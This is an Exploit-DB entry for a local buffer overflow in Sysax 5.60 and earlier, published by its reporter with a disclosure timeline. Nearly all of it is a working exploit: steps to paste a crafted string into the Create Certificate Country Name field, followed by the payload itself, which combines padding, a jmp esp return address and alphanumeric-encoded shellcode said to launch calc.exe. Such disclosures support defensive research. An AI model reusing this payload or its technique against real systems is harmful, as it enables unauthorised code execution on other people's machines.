Sysax <= 5.60 Create SSL Certificate Buffer Overflow

2012-06-04T00:00:00
ID EDB-ID:18981
Type exploitdb
Reporter Craig Freyman
Modified 2012-06-04T00:00:00

Description

Sysax <= 5.60 Create SSL Certificate Buffer Overflow. Local exploit for windows platform

                                        
                                            #Title: Sysax &lt;= 5.60 Create SSL Certificate Buffer Overflow
#Author: Craig Freyman (@cd1zz)
#Tested on: Windows XP SP3
#Discovered: May 29, 2012
#Vendor notified: May 30, 2012
#Details: http://www.pwnag3.com/2012/06/sysax-create-ssl-certificate-buffer.html

#Go to Manage Server Settings -&gt; Security Settings Configure -&gt; Create Certificate -&gt; &lt;Paste the value below into the Country Name field&gt;
#You will get an error, click OK and voila, code execution

#calc.exe shell32.ll jmp esp 7cb97475 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAut¹|GGGGGGGGGGGGGGÛÅÙt$ôYIIIICCCCCCCQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLJHK9S030EPU0MYKUVQ9BE4LKPRVPLK1BTLLKQBUDLKBR184ONWQZ1601KOVQYPNL7LE13LERFLWPIQ8O4MC1O7JBZPQBV7LKF220LKW2GLEQN0LK1P48LE9P2TPJS1XPPPLKW8DXLK0XWPEQ8SKS7L0ILKFTLKUQXV6QKOFQ9PNL9QHO4M5QYW08M03EJTS3SML8WKSMVDT5M2QHLK68Q431HS3VLKDLPKLK0X5L318SLKTDLK5QN0K9PDQ46DQKQK3QQI0ZV1KOKP68QOPZLKB2ZKLFQM2J5QLMMUH930EPUPV0BHVQLK2OK7KOXUOKZPOEY20VU8Y6Z5OMMMKON5GL5VCL5ZMPKKKPT55UOKPG23D2RORJ30QCKO8UBC51RLSSVNBE3H55UPAAGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGG